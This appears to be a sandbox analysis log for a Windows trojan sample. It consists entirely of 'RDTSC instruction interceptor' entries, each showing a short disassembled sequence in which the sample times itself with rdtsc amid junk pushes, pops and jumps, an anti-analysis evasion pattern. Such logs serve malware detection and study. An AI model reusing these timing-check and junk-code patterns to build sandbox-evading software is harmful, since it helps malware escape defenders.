Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B3E4B6 second address: B3E4BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B3C523 second address: B3C557 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FABC9471C30h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FABC9471C3Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B3E4BC second address: B3E563 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FABC90CD75Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FABC90CD768h 0x00000010 nop 0x00000011 or di, BB77h 0x00000016 mov ebx, dword ptr [ebp+122D3432h] 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov dword ptr [ebp+122D3670h], eax 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 mov dword ptr [ebp+122D1ECCh], ecx 0x00000036 mov eax, dword ptr [ebp+122D10CDh] 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007FABC90CD758h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 00000019h 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 jng 00007FABC90CD756h 0x0000005c push FFFFFFFFh 0x0000005e push 00000000h 0x00000060 push ebx 0x00000061 call 00007FABC90CD758h 0x00000066 pop ebx 0x00000067 mov dword ptr [esp+04h], ebx 0x0000006b add dword ptr [esp+04h], 00000019h 0x00000073 inc ebx 0x00000074 push ebx 0x00000075 ret 0x00000076 pop ebx 0x00000077 ret 0x00000078 mov bl, F6h 0x0000007a push eax 0x0000007b push esi 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f popad 0x00000080 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B4142B second address: B41450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Dh 0x00000007 jmp 00007FABC9471C30h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B41450 second address: B41454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B41454 second address: B41458 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B41C81 second address: B41C85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B42CF9 second address: B42CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B43E9A second address: B43EB0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FABC90CD758h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jbe 00007FABC90CD75Eh 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B42CFD second address: B42D07 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FABC9471C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B47B04 second address: B47B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FABC90CD764h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AD7898 second address: AD789C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B4CE23 second address: B4CE3C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FABC90CD75Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B4CFBE second address: B4CFC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FABC9471C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B52508 second address: B5250D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B56C5C second address: B56C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B56C63 second address: B56C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B56DF7 second address: B56DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B56DFD second address: B56E12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FABC90CD756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B56F72 second address: B56F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FABC9471C26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B56F7E second address: B56F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B56F83 second address: B56F94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FABC9471C26h 0x00000009 jnp 00007FABC9471C26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B56F94 second address: B56F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AE3775 second address: AE377D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AE377D second address: AE3784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B5BAC4 second address: B5BAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B5BAC8 second address: B5BAEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD764h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FABC90CD75Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B5BD85 second address: B5BD90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FABC9471C26h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B5BD90 second address: B5BD96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B5BD96 second address: B5BD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B5B50B second address: B5B527 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007FABC90CD756h 0x00000009 jmp 00007FABC90CD75Ah 0x0000000e pop ebx 0x0000000f jl 00007FABC90CD75Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B5C4AA second address: B5C4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jbe 00007FABC9471C2Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B5C4BF second address: B5C4C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B5C4C5 second address: B5C4CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B5C4CE second address: B5C4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B5C7D4 second address: B5C7E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABC9471C2Dh 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B30C16 second address: B30C20 instructions: 0x00000000 rdtsc 0x00000002 je 00007FABC90CD75Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B30D70 second address: B30D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B30D74 second address: B30D7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B30D7A second address: B30D96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B30D96 second address: B30D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B30D9F second address: B30DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B30DA3 second address: B30DD8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FABC90CD75Ah 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007FABC90CD75Eh 0x00000017 pop eax 0x00000018 mov edx, edi 0x0000001a call 00007FABC90CD759h 0x0000001f pushad 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B30DD8 second address: B30DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FABC9471C26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B30F4A second address: B30F7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD765h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FABC90CD763h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B30F7C second address: B30F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B30F80 second address: B30F84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B310BC second address: B310CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FABC9471C2Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B310CD second address: B310D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B310D1 second address: B310DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FABC9471C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B31316 second address: B3131C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B3131C second address: B31320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B31320 second address: B31324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B31324 second address: B3134B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jnl 00007FABC9471C2Ch 0x0000000f push 00000004h 0x00000011 mov edx, 04B5A3A5h 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007FABC9471C26h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B3134B second address: B31351 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B31351 second address: B3135B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FABC9471C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B3135B second address: B3135F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B317D1 second address: B317D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B31A6E second address: B31AB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jg 00007FABC90CD756h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FABC90CD758h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+1245AEBFh] 0x00000031 lea eax, dword ptr [ebp+1249552Eh] 0x00000037 mov cx, bx 0x0000003a push eax 0x0000003b push ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6046F second address: B60480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jno 00007FABC9471C26h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B60BE8 second address: B60BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B60BEC second address: B60BF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B60BF0 second address: B60C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FABC90CD75Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B65412 second address: B65430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FABC9471C37h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B65430 second address: B65434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6948A second address: B69496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FABC9471C26h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6D6F1 second address: B6D6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6D6F7 second address: B6D6FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6D6FD second address: B6D706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6D706 second address: B6D718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6D862 second address: B6D871 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007FABC90CD756h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6DB78 second address: B6DB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6E0EA second address: B6E0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6E0F0 second address: B6E0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6E0F5 second address: B6E0FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6E0FB second address: B6E0FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6E0FF second address: B6E109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6E109 second address: B6E113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FABC9471C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6E597 second address: B6E59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6E59D second address: B6E5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6E5A3 second address: B6E5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6E5AC second address: B6E5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6D3FF second address: B6D403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6D403 second address: B6D422 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
